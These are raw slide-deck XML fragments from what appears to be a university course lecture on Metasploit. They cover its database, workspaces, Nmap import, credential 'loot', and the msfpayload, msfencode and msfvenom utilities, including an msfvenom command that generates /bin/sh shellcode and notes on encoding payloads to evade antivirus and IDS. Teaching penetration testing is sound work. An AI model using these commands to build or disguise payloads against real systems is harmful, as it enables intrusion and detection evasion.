          <p:cNvPr id="278" name="Shape 278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Metasploit keeps track of everything you have done to the target network with it, in its database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Essential for documenting a pentest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="279" name="Shape 2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3157950" x="457200"/>
            <a:ext cy="3409950" cx="60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" name="Shape 28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84" name="Shape 284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The database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285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Database has to be configured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built-in support for PostgreSQL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allows for importing/exporting results from/to 3rd party tools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keeps results clean and organized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" name="Shape 4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3" name="Shape 43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Not just a tool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An entire framework for automating various tasks for penetration testing / attacking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Allows you to easily build attack vectors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scanners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exploits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payloads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encoders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" name="Shape 44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What is Metasploit (MSF)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Shape 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4097704" x="3463603"/>
            <a:ext cy="2470195" cx="52231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9" name="Shape 28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90" name="Shape 290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Database workspaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Shape 291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A "default" workspace is always created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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful to create workspaces as needed, to keep organized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workspace -a test1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switch to the workspace with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>workspace test1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delete with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>workspace -d test1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for help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>workspace -h </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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" name="Shape 29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96" name="Shape 296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The database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297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List all hosts in the database:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Shape 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2590800" x="457200"/>
            <a:ext cy="1752600" cx="83452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" name="Shape 30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03" name="Shape 303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The database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304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List all the ports / services info gathered from known hosts:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Shape 3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2777575" x="457200"/>
            <a:ext cy="3009900" cx="602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9" name="Shape 30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10" name="Shape 310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The database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Shape 311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View the log of utilized vulns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>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and so on...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Shape 3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2500675" x="457200"/>
            <a:ext cy="971550" cx="636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" name="Shape 31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17" name="Shape 317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Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 318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b="1" sz="3600" lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Shape 3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2119725" x="457200"/>
            <a:ext cy="4448175" cx="634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" name="Shape 32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24" name="Shape 324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Importing from 3rd party tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325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db_import /path/to/tool/results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msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="13C16A"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>db_import /root/msfu/nmapScan</a:t>
            </a:r>
            <a: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b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sz="1400" lang="en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[*]</a:t>
            </a:r>
            <a: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 Importing 'Nmap XML' data</a:t>
            </a:r>
            <a:b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sz="1400" lang="en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[*]</a:t>
            </a:r>
            <a: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 Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'</a:t>
            </a:r>
            <a:b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sz="1400" lang="en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[*]</a:t>
            </a:r>
            <a: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 Importing host 172.16.194.172</a:t>
            </a:r>
            <a:b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sz="1400" lang="en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[*]</a:t>
            </a:r>
            <a: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 Successfully imported /root/msfu/nmapScan</a:t>
            </a:r>
            <a:b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msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="13C16A"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
            <a:b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Hosts</a:t>
            </a:r>
            <a:b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=====</a:t>
            </a:r>
            <a:b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address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments</a:t>
            </a:r>
            <a:b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-------         ---                ----  -------  ---------  -----  -------  ----  --------</a:t>
            </a:r>
            <a:b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172.16.194.172  00:0C:29:D1:62:80        Linux    Ubuntu            server         </a:t>
            </a:r>
            <a:b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sz="1400" lang="en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msf &gt;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9" name="Shape 32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30" name="Shape 330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loot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 331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hash dumps / creds from Windows or *nix systems are stored in database.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rPr lang="en"/>
              <a:t>msf &gt; loot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32" name="Shape 3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3129375" x="4210050"/>
            <a:ext cy="3438525" cx="447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6" name="Shape 33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37" name="Shape 337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Backing up / Exporting the DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338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db_export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can either be XML or PWDUMP format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db_export -f xml /root/Exported.xml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39" name="Shape 3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2941050" x="1652587"/>
            <a:ext cy="2286000" cx="583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3" name="Shape 34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44" name="Shape 344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3786737" x="685800"/>
            <a:ext cy="1046400" cx="77724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sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="639998" x="858875"/>
            <a:ext cy="1546500" cx="3656399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Metasploit Utilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Shape 3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2213169" x="2489491"/>
            <a:ext cy="4644830" cx="6606859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Shape 347"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5603225" x="5992625"/>
            <a:ext cy="746399" cx="28989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Kinda like this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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1" name="Shape 35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52" name="Shape 352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These are direct interfaces to specific features of the MSF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MSFpayload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can provide/generate shellcode, executables, and much more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MSFencode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for encoding payloads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MSFvenom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nasm_shell.rb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...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3" name="Shape 353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Metasploit Utilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Shape 3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3834943" x="5953969"/>
            <a:ext cy="2732830" cx="27328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" name="Shape 4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0" name="Shape 50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Open source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written in Ruby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Designed by HD Moore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Maintained by Rapid7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Comes with the Backtrack penetration testing Linux distro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Makes life super easy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hack like the movies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b="1" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 51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Metasploit details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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8" name="Shape 35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59" name="Shape 359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nasm_shell.rb </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360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/opt/metasploit/msf3/tools# ./nasm_shell.rb 64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(its location may vary)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Friendly tool for assembling instructions into opcode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32 and 64 bit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133333"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>/opt/metasploit/msf3/tools# ./nasm_shell.rb </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="133333"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>default 32 bit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133333"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>/opt/metasploit/msf3/tools# ./nasm_shell.rb 64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="133333"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>for 64 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" marL="91440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  <p:transition spd="slow">
    <p:cut/>
  </p:transition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4" name="Shape 36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65" name="Shape 365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nasm_shell.rb example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="3957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Great for working with shellcode at the byte-level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67" name="Shape 3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5243925" x="4419600"/>
            <a:ext cy="1323975" cx="426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Shape 3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1600200" x="4667250"/>
            <a:ext cy="2505075" cx="401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2" name="Shape 37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73" name="Shape 373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Will generate simple shellcode in many formats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C, Ruby, Javascript, VB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Shellcode notes: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often with nullbytes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often the results of MSFpayload (when unencoded) will also be caught by IDS / AV on a network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msfpayload -h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for help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4" name="Shape 374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MSFpayload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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8" name="Shape 37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79" name="Shape 379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Payload notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 380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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Singles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self contained and standalone payloads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Can be as simple as running firefox.exe or adding a user account to the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stagers  (noted by a '/' in the payload name)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Setup a network connection between victim &amp; attacker, and are designed for reliability.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common for multiple stagers to be chained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- payload components downloaded &amp; run by stagers (often provide advanced features)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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4" name="Shape 38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85" name="Shape 385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MSFpayload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386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Vast array of different types of shellcode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can be easily modified / customized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msfpayload -l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Options are set via command line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0" name="Shape 39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91" name="Shape 391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MSFpayload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392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See each payloads options (with O):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93" name="Shape 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2229975" x="457200"/>
            <a:ext cy="3905250" cx="654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7" name="Shape 39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98" name="Shape 398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MSFpayload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399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sz="1400" lang="en"/>
              <a:t>Usage: /opt/metasploit/msf3/msfpayload [&lt;options&gt;] &lt;payload&gt; [var=val] &lt;[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar&gt;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Set the options in command line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Specify at the end which format to print it in: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Raw (raw binary of the shellcode)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C (source)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Perl (source)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PHP (source)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Ruby (source)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exe (PE binary/application)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dll (binary/application)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VBA (macro source)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WAR (.zip archive)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Javascript (source)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3" name="Shape 40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04" name="Shape 404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MSFpayload examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Shape 405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pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Shape 4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664700" x="457200"/>
            <a:ext cy="4838700" cx="627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0" name="Shape 41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11" name="Shape 411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MSFpayload examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412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pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="Shape 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600200" x="457200"/>
            <a:ext cy="4029075" cx="478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7" name="Shape 41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18" name="Shape 418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Utility for dealing with bad bytes and null bytes.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input = raw binary (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> output from MSFpayload)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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Null bytes are shellcode-specific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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bad bytes are exploit-specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad characters/bytes are a result of some kind of operation performed on the payload, before the payload gets executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x0a is a terminator for many network protocols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Sports a number of encoder algorithms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AV / IDS / security companies frequently update their signatures to detect these encoder algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Smart attackers write their own!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Shape 419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MSFencode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" name="Shape 5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pic>
        <p:nvPicPr>
          <p:cNvPr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703084" x="7333294"/>
            <a:ext cy="1728961" cx="131367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Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4298200" x="4380900"/>
            <a:ext cy="2390699" cx="4672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bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="ctr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3810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b="1" sz="2400" lang="en" i="1"/>
              <a:t>"Metasploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en" i="1"/>
              <a:t>The Penetration Tester's Guide</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en" i="1"/>
              <a:t>"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b="1" lang="en" i="1"/>
              <a:t>worth the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-3810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b="1" sz="2400" lang="en" i="1"/>
              <a:t>Guide from the Offensive Security Team (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No affiliation with this class or FSU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en" i="1"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/metasploit-unleashed/Main_Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-3810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b="1" sz="2400" lang="en" i="1"/>
              <a:t>Tutorial videos from securitytube.net:</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" sz="2400" lang="en" i="1"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.securitytube.net/groups?operation=view&amp;groupId=10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 59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Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Shape 6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y="4313237" x="4462033"/>
            <a:ext cy="2290625" cx="45379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3" name="Shape 42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24" name="Shape 424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MSFencode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="22886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sz="1800" lang="en"/>
              <a:t>List the available encoders with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfencode -l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rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>various platforms supported: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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>x86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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>x64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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>php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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>sparc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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>mipsle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66666"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>ppc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426" name="Shape 4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519650" x="2809875"/>
            <a:ext cy="5048250" cx="587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0" name="Shape 43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31" name="Shape 431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MSFencode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432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MSF's default encoder is shikata_ga_nai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x86/shikata_ga_nai            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Rank: excellent  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Description: Polymorphic XOR Additive Feedback Encoder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Many encoding options are specifically useful for certain circumstances / fileformats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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6" name="Shape 43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37" name="Shape 437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Utility for generating custom shellcode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custom combination of MSFpayload + MSFencode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32 and 64 bit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Multiple architectures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customizable commands </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>do things other than pop '/bin/sh'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somewhat friendly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by default generates encoded shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nondeterministic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-381000" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>YMMV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8" name="Shape 438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MSFvenom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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2" name="Shape 44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43" name="Shape 443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Example use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/exec CMD='/bin/sh' -a x86 -b '\x00' -i 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="91440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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>-p specifies the payload/vector. Here linux/x64/exec indicates 64bit exec()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="91440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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>CMD specifies the command to pass to the payload.  In this case it specifies the parameter to pass to exec(). note the quotation marks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="91440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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>-a specifies the architecture. Here 64bit x86 is passed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="9144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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>-b specifies the bad characters to TRY to avoid during encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en" i="1"/>
              <a:t>*This sometimes fails</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>).  Will be ignored if not encoded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-298450" marL="9144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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>-i specifies the number of times to encode (here zero).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4" name="Shape 444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MSFvenom example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition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8" name="Shape 44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49" name="Shape 449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Example use:</a:t>
            </a:r>
          </a:p>
          <a:p>
